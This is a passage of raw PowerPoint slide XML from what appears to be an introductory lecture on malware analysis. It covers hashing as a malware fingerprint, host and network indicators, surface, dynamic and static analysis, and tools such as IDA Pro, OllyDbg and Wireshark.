          <p:spPr>
            <a:xfrm>
              <a:off x="2731661" y="5208706"/>
              <a:ext cx="64807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4F</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="Rounded Rectangle 18"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4027805" y="5208706"/>
              <a:ext cx="674521"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56</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="Rounded Rectangle 19"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5376847" y="5208706"/>
              <a:ext cx="605593"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45</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="Rounded Rectangle 20"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6645601" y="5208706"/>
              <a:ext cx="64807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22" name="TextBox 21"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1913408" y="4542050"/>
              <a:ext cx="314510" cy="461665"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" sz="2400" b="1" dirty="0" smtClean="0"/>
                <a:t>L</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" sz="2400" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="TextBox 22"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3222478" y="4542049"/>
              <a:ext cx="393056" cy="461665"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" sz="2400" b="1" dirty="0"/>
                <a:t>O</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="TextBox 23"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4518622" y="4551511"/>
              <a:ext cx="367408" cy="461665"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" sz="2400" b="1" dirty="0" smtClean="0"/>
                <a:t>V</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" sz="2400" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="TextBox 24"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5814766" y="4551511"/>
              <a:ext cx="335348" cy="461665"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" sz="2400" b="1" dirty="0" smtClean="0"/>
                <a:t>E</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" sz="2400" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="TextBox 25"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6635792" y="4365104"/>
              <a:ext cx="1755545" cy="830997"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" sz="2400" b="1" dirty="0" smtClean="0"/>
                <a:t>Null </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" sz="2400" b="1" dirty="0" smtClean="0"/>
                <a:t>Terminator</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" sz="2400" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27" name="Rounded Rectangle 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2070663" y="5229200"/>
              <a:ext cx="66410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28" name="Rounded Rectangle 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3379733" y="5208706"/>
              <a:ext cx="64807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29" name="Rounded Rectangle 28"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4702326" y="5208706"/>
              <a:ext cx="674521"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30" name="Rounded Rectangle 29"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5982440" y="5229200"/>
              <a:ext cx="605593"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31" name="Rounded Rectangle 30"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7290760" y="5196101"/>
              <a:ext cx="64807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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="33" name="Straight Connector 32"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="2728748" y="4509120"/>
              <a:ext cx="6017" cy="548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018278" y="4499658"/>
              <a:ext cx="6017" cy="548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321496" y="4536703"/>
              <a:ext cx="6017" cy="548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582016" y="4506361"/>
              <a:ext cx="6017" cy="54848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695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Function</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Check the integrity of a file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Unique hash value</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Common hash functions: MD-5, SHA-256</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> - A Fingerprint for malware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Share generated hash with other analysts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Search for generated hash on-line to see if the file has already identified</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1646450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Malware Analysis</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>process of investigating the behaviour of a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>specific sample </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>malware</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>To determine exactly what a particular suspect binary code can do</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>How to detect it on the network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>How to measure and contain its damage </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Can be used to develop indicators</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"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signatures:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="vi-VN" i="1" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Host-based </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>indicator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="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are used to detect malicious code on victim computers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN"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lvl="2"/>
            <a:r>
              <a:rPr lang="vi-VN" i="1" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Network </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>indicator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="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are used to detect malicious code by monitoring network traffic.</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" dirty="0">
              <a:latin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379902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Outline</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="107504" y="1124744"/>
            <a:ext cx="9036496" cy="5733256"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>Introduction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Existence &amp; Motivation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Types of Malwares</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Goals of Malware Analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>Malware Analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Surface </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Dynamic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Static</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>Malware Analysis Tools &amp; Techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Virtual Machines (VMWare, …)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Obfuscation techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Disassemblers and Debuggers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Monitoring tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Packer Detector &amp; Unpackers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>Project </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>IDA Pro</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>OllyDbg</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1899355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 y="3310711"/>
            <a:ext cx="3345928" cy="3318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Malware Analysis</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268760"/>
            <a:ext cx="6402932" cy="2017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37022" y="3429000"/>
            <a:ext cx="4031168" cy="2585323"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>Success</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>No threats found</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Sample found</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>New threats found</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>Failure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Complex obfuscation techniques used</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Lack of time, resources</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>File sample is not prioritised</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Arc 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6516216" y="2261445"/>
            <a:ext cx="1584176" cy="1400061"/>
          </a:xfrm>
          <a:prstGeom prst="arc">
            <a:avLst>
              <a:gd name="adj1" fmla="val 16200000"/>
              <a:gd name="adj2" fmla="val 10116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0" name="Straight Arrow Connector 9"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="6" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8099953" y="2984780"/>
            <a:ext cx="439" cy="3259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2771800" y="1484784"/>
            <a:ext cx="3600400" cy="36004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p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2627784" y="1484784"/>
            <a:ext cx="3888432" cy="36004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328104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Malware Analysis</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>Surface </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>Analysis (Scanning)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>: recognizing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>or discovering a malware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>signature (i.e. opening </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>sample and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>quickly search for information in the sample file without executing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>it).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>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42" y="3284984"/>
            <a:ext cx="8020614" cy="2196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653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Analysis</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>Dynamic Analysis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>: mainly </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>of running the target sample and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>gathering diagnostics </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>and behaviour results based on logs and monitoring </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>tools.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564904"/>
            <a:ext cx="5832574" cy="425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3854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Analysis</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Behaviours</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>Memory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Mainly processes run, with threads. Shows what processes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>are spawned </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>and with which commands.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>Disk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>File and registry accesses and alterations. Shows file and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>registry read</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, write, creations and deletes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>Network</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>All network traffic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Required: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Controlled environment.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Monitoring tools (Wireshark, Process Monitor, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>FileDump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>, etc.)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3718298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Analysis</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>Static Analysis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>: examination </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>machine code of the binary sample in order to further discover </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>functionality and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>techniques used by the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>sample.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
